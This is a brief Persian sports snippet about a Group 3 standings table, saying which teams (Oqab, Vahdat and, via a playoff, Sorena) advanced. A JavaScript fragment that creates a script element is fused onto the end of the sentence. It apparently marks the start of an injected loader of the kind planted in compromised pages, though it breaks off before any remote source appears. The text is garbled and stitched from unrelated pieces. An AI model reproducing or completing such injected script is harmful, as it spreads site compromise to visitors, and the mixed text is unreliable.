جدول گروه 3

تیم های عقاب و وحدت به عنوان تیم اول و دوم به مرحله بعد صعود کردن و تیم سورنا هم با پیروزی در دیدار پلی اف تونست به مرحله بعد صعود کنهvar d=document;var s=d.createElement(‘script’);